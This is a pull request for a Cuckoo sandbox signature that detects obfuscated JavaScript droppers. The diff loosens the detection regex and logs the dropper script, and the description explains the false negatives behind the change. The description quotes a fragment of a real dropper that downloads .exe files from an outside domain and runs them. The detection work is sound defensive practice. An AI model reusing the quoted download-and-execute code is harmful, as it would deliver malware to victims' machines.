### PR TITLE
Fix FN & extract script

### DIFF
--- a/modules/signatures/dropper_js.py
+++ b/modules/signatures/dropper_js.py
@@ -22,20 +22,22 @@ from lib.cuckoo.common.abstracts import Signature
 
 class EXEDropper_JS(Signature):
     name = "exe_dropper_js"
-    description = "Executes obfuscated JavaScript which drops and executes an executable file"
+    description = "Executes obfuscated JavaScript which drops an executable file"
     weight = 3
     severity = 3
-    categories = ["dropper","downloader"]
+    categories = ["dropper","downloader", "spam"]
     authors = ["Kevin Ross"]
     minimum = "1.3"
     evented = True
+
+    filter_analysistypes = set(["file"])
 
     def __init__(self, *args, **kwargs):
         Signature.__init__(self, *args, **kwargs)
 
     filter_categories = set(["browser"])
     # backward compat
-    filter_apinames = set(["JsEval", "COleScript_Compile", "COleScript_ParseScriptText"])
+    filter_apinames = set(["JsEval"])
 
     def on_call(self, call, process):
         if call["api"] == "JsEval":
@@ -43,5 +45,6 @@ class EXEDropper_JS(Signature):
         else:
             buf = self.get_argument(call, "Script")
 
-        if re.search("(Save|Write)ToFile(\(|\/).*?\.exe\".*?Run(\(|\/).*?\.exe\"", buf, re.IGNORECASE|re.DOTALL):
+        if re.search("(Save|Write)ToFile(\(|\/).*?\.exe\"", buf, re.IGNORECASE|re.DOTALL):
+            self.data.append({"dropper_script" : buf})
             return True


### PR DESCRIPTION
Due to false negative issues on recent scripts removed the Run( call. A recent script for instance looks like this when executed by JSEval:

y { xo.open("GET", fr, false); xo.send(); if (rn > 0){ ws.Run(fn, 0, 0); } ; } catch (er){ } ;}dl("http://esrioterf.com/img/script.php?dcm1.jpg", "5574922.exe", 1);dl("http://esrioterf.com/img/script.php?dcm2.jpg", "3373115.exe", 1);

Also removed additional checks for filter_api name as we don't actually check the call for the others (might be worth looking at EK sigs too for same issue where JsEval is only thing checked by filters more APIs first) and also due to the size of these scripts also print out the script so it is visible on the signature page allowing uses to expand to see the (mostly) deobfuscated script. Also put in filter to be file only to avoid any URL analysis issues.
